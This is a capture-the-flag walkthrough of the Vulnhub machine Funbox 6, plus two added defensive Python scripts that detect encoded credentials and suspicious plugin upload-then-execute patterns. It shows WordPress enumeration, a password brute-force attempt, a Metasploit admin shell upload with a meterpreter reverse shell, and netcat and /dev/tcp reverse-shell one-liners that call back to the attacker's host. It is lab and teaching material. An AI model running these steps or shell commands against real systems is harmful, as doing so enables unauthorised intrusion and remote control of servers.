Funbox 6
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:75:6d:38 1 60 PCS Systemtechnik GmbH
192.168.56.160 08:00:27:e7:37:5d 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.160.
NMAP scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.160 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-09 02:05 EST
Nmap scan report for localhost (192.168.56.160)
Host is up (0.00019s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 0e:4f:3c:37:75:8a:a4:4d:bb:17:50:1b:ec:93:02:15 (RSA)
| 256 d7:dc:fc:b1:76:d6:76:13:da:ea:c4:30:04:bc:da:d2 (ECDSA)
|_ 256 51:19:47:a6:29:c8:22:10:c2:73:34:ad:de:7f:57:d3 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox6.box/
MAC Address: 08:00:27:E7:37:5D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.40 seconds
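The NMAP scan results show that the target host has 2 open ports: 22 (SSH) and 80 (HTTP).
Getting a shell
Browsing to port 80 does not load the site; it redirects to funbox6.box instead, so add that name to the /etc/hosts file: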
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.160 funbox6.box
Refresh the page; the returned page shows that this is a WordPress site.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ nikto -h http://192.168.56.160
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.160
+ Target Hostname: 192.168.56.160
+ Target Port: 80
+ Start Time: 2023-01-09 02:10:11 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://funbox6.box/
+ Uncommon header 'link' found, with multiple values: (<http://funbox6.box/index.php/wp-json/>; rel="https://api.w.org/",<http://funbox6.box/index.php/wp-json/wp/v2/pages/17>; rel="alternate"; type="application/json",<http://funbox6.box/>; rel=shortlink,)
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2023-01-09 02:11:20 (GMT-5) (69 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ gobuster dir -u http://192.168.56.160 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.160
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/09 02:11:45 Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 321] [--> http://192.168.56.160/wp-content/]
/wp-includes (Status: 301) [Size: 322] [--> http://192.168.56.160/wp-includes/]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.56.160/wp-admin/]
/server-status (Status: 403) [Size: 279]
Progress: 220364 / 220561 (99.91%)
===============================================================
2023/01/09 02:12:23 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ wpscan --url http://192.168.56.160 -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
Scan Aborted: The URL supplied redirects to http://funbox6.box/. Use the --ignore-main-redirect option to ignore the redirection and scan the target, or change the --url option value to the redirected URL.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ wpscan --url http://funbox6.box -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://funbox6.box/ [192.168.56.160]
[+] Started: Mon Jan 9 02:14:32 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://funbox6.box/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://funbox6.box/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://funbox6.box/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://funbox6.box/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
| Found By: Rss Generator (Passive Detection)
| - http://funbox6.box/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
| - http://funbox6.box/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://funbox6.box/wp-content/themes/twentyseventeen/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://funbox6.box/wp-content/themes/twentyseventeen/readme.txt
| [!] The version is out of date, the latest version is 3.1
| Style URL: http://funbox6.box/wp-content/themes/twentyseventeen/style.css?ver=20190507
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://funbox6.box/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.4'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://funbox6.box/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Jan 9 02:14:42 2023
[+] Requests Done: 54
[+] Cached Requests: 7
[+] Data Sent: 13.281 KB
[+] Data Received: 512.118 KB
[+] Memory used: 239.348 MB
[+] Elapsed time: 00:00:10
Can the password be cracked?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ wpscan --url http://funbox6.box -U admin -P /usr/share/wordlists/rockyou.txt
Surprisingly, the admin password was not cracked, so it is necessary to go back and look at the site itself for clues.
Opening the hello-world post shows a response:
admin
September 9, 2020 at 1:37 pm
flag{MFSG22LOHJTWC3LCNRSWQYLMNQ3TONY=}
Decoding it gives:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ echo 'MFSG22LOHJTWC3LCNRSWQYLMNQ3TONY=' | base32 -d
admin:gamblehall777
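Haha, so that is where the secret was. Next, log in to the WordPress admin dashboard.
But it reported that the password was wrong!!! The target host may have anti-brute-force measures; after rebooting the target VM and logging in again, the login to the WordPress dashboard succeeded.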
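The comment on the hello-world post exposed the admin credentials as Base32 text. As an added example (not part of the original post), this is a content audit a site owner could run over comments or posts: it finds Base32/Base64 runs that decode to a user:password pair. The function names, the regexes and the second and third sample comments are constructed for illustration.

```python
import base64
import binascii
import re

# Candidate tokens: 16+ characters from each alphabet, optional '=' padding.
B32_RUN = re.compile(r"(?<![A-Za-z0-9])[A-Z2-7]{16,}={0,6}")
B64_RUN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}")
# Decoded text shaped like "user:password" (printable ASCII, no spaces).
CRED = re.compile(r"[A-Za-z0-9._@-]{1,32}:[\x21-\x7e]{4,64}")

DECODERS = [
    ("base32", B32_RUN, base64.b32decode, 8),
    ("base64", B64_RUN, lambda s: base64.b64decode(s, validate=True), 4),
]


def _try_decode(token, decoder, block):
    """Decode token; return stripped ASCII text, or None if it is not valid."""
    body = token.rstrip("=")
    padded = body + "=" * (-len(body) % block)  # tolerate missing padding
    try:
        text = decoder(padded).decode("ascii")
    except (binascii.Error, ValueError):  # UnicodeDecodeError is a ValueError
        return None
    text = text.strip()  # `echo secret | base32` encodes a trailing newline
    return text if text.isprintable() else None


def find_encoded_credentials(text):
    """Return (token, encoding, decoded) for tokens decoding to user:password."""
    findings = []
    for name, pattern, decoder, block in DECODERS:
        for match in pattern.finditer(text):
            decoded = _try_decode(match.group(0), decoder, block)
            if decoded and CRED.fullmatch(decoded):
                findings.append((match.group(0), name, decoded))
    return findings


# First comment is the one quoted in the write-up; the others are constructed.
SAMPLE_COMMENTS = [
    "flag{MFSG22LOHJTWC3LCNRSWQYLMNQ3TONY=}",
    "Great post, thanks for sharing this with everybody!",
    "Order reference ABCDEFGHIJKLMNOPQRSTUVWX, please confirm.",
]

if __name__ == "__main__":
    for comment in SAMPLE_COMMENTS:
        for token, encoding, decoded in find_encoded_credentials(comment):
            user = decoded.split(":", 1)[0]
            # Report the account name only; never echo the recovered secret.
            print(f"{encoding} credential for '{user}' in token {token[:8]}...")
```

Encoding is not protection: any credential found this way should be rotated and the comment removed.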
When trying to modify the 404 template, Update File reports an error:
Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.
So another way to get a shell has to be found.
msf6 > search wp_admin
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_admin_shell_upload
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
Module options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-M
etasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
USERNAME yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 192.168.56.146
LHOST => 192.168.56.146
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.56.160
RHOSTS => 192.168.56.160
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD gamblehall777
PASSWORD => gamblehall777
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
Module options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD gamblehall777 yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.56.160 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-M
etasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
USERNAME admin yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.146 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 192.168.56.146:5555
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS funbox6.box
RHOSTS => funbox6.box
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 192.168.56.146:5555
[*] Authenticating with WordPress using admin:gamblehall777...
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show advanced
Module advanced options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
AllowNoCleanup false no Allow exploitation without the possibility of cleaning
up files
ContextInformationFile no The information file that contains context information
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set
to false for non-IIS servers
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
FileDropperDelay no Delay in seconds before attempting cleanup
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to exist
ing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset
to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLServerNameIndication no SSL/TLS Server Name Indication (SNI)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS a
nd SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL
23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/5.0 (Macintosh; Intel no The User-Agent header to use for all requests
Mac OS X 12_2_1) AppleWebKit/6
05.1.15 (KHTML, like Gecko) Ve
rsion/15.2 Safari/605.1.15
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WPCHECK true yes Check if the website is a valid WordPress install
WPCONTENTDIR wp-content yes The name of the wp-content directory
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in second
s
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP
transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScrip
t)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://github.c
om/rapid7/metasploit-framework/wiki/Meterpreter-Debugging-Meterpr
eter-Sessions
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires
tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will
NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should b
e killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut
down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableS
tageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compa
tible
StagerRetryCount 10 no The number of times the stager should retry if the first connect
fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attemp
ts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set VERBOSE true
VERBOSE => true
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 192.168.56.146:5555
[*] Authenticating with WordPress using admin:gamblehall777...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Acquired a plugin upload nonce: dda85bdb40
[*] Uploaded plugin jOYtyoFTQM
[*] Executing the payload at /wp-content/plugins/jOYtyoFTQM/gYuPdLwmQF.php...
[*] Sending stage (39927 bytes) to 192.168.56.160
[+] Deleted gYuPdLwmQF.php
[+] Deleted jOYtyoFTQM.php
[+] Deleted ../jOYtyoFTQM
[*] Meterpreter session 1 opened (192.168.56.146:5555 -> 192.168.56.160:57320) at 2023-01-09 02:50:42 -0500
meterpreter > shell
Process 2026 created.
Channel 0 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),27(sudo),100(users)
which nc
sh: 0: getcwd() failed: No such file or directory
/bin/nc
nc -e /bin/bash 192.168.56.146 6666
nc: invalid option -- 'e'
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
[-P proxy_username] [-p source_port] [-q seconds] [-s source]
[-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
[-x proxy_address[:port]] [destination] [port]
which python
sh: 0: getcwd() failed: No such file or directory
which python3
sh: 0: getcwd() failed: No such file or directory
/usr/bin/python3
bash -i >& /dev/tcp/192.168.56.146/6666 0>&1
/bin/sh: 7: Syntax error: Bad fd number
meterpreter > shell
Process 2034 created.
Channel 1 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
which python3
sh: 0: getcwd() failed: No such file or directory
/usr/bin/python3
bash -c 'bash -i >& /dev/tcp/192.168.56.146/6666 0>&1'
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
[*] 192.168.56.160 - Meterpreter session 1 closed. Reason: Died
The shell obtained from meterpreter seems unstable, so quickly spawn another shell.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ sudo nc -nlvp 6666
[sudo] password for kali:
listening on [any] 6666 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.160] 40758
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
bash: cannot set terminal process group (2013): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
www-data@funbox6:$ exit
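But the connection for this shell dropped very quickly.
Repeating the steps above, the target host's IPS or firewall then refuses the login, and the only option is to reboot the target host.
Note that the site's home page has a subtitle, open, which changes to closed after a while; when it is closed, logging in is not possible.
You have to wait for the status to change to Open before continuing; that is the working approach.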
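The verbose Metasploit output above shows a plugin upload followed at once by a request to a PHP file in the new plugin directory. As an added example (not from the original post), this detection looks for that sequence in an Apache access log. The log lines are constructed, reusing the addresses and plugin names from the output above, and the upload endpoint /wp-admin/update.php?action=upload-plugin is WordPress's standard plugin upload URL rather than something shown on the page.

```python
import re
from datetime import datetime, timedelta

# Apache combined/common log prefix: ip, timestamp, request line, status.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# WordPress handles plugin ZIP uploads at this admin endpoint.
UPLOAD = re.compile(r"^/wp-admin/update\.php\?(?:[^#]*&)?action=upload-plugin(?:&|$)")
# Direct request for a PHP file inside a plugin directory.
PLUGIN_PHP = re.compile(r"^/wp-content/plugins/(?P<slug>[^/?]+)/[^?]*\.php(?:\?|$)")


def detect_upload_then_execute(lines, window=timedelta(seconds=60)):
    """Flag clients that upload a plugin and then request plugin PHP directly."""
    last_upload = {}  # client ip -> time of its most recent plugin upload
    alerts = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        when = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip, path = m["ip"], m["path"]
        if m["method"] == "POST" and UPLOAD.match(path):
            last_upload[ip] = when
            continue
        hit = PLUGIN_PHP.match(path)
        if hit and ip in last_upload:
            delay = when - last_upload[ip]
            if timedelta(0) <= delay <= window:
                alerts.append({
                    "ip": ip,
                    "plugin": hit["slug"],
                    "path": path,
                    "status": int(m["status"]),
                    "seconds_after_upload": int(delay.total_seconds()),
                })
    return alerts


# Constructed access-log sample: one slow, ordinary plugin install from
# 192.168.56.1 and the upload/execute pair seen in the session above.
SAMPLE_LOG = """\
192.168.56.1 - - [09/Jan/2023:02:40:00 -0500] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.56.1 - - [09/Jan/2023:02:45:00 -0500] "GET /wp-content/plugins/akismet/akismet.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.56.146 - - [09/Jan/2023:02:50:40 -0500] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.56.146 - - [09/Jan/2023:02:50:41 -0500] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.56.146 - - [09/Jan/2023:02:50:42 -0500] "GET /wp-content/plugins/jOYtyoFTQM/gYuPdLwmQF.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for alert in detect_upload_then_execute(SAMPLE_LOG):
        print(alert)
```

Because the module deletes its files after the session opens, the access log may be the only record of the plugin path, so ship it off-host before relying on this check.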
From: https://www.cnblogs.com/jason-huawen/p/17037410.html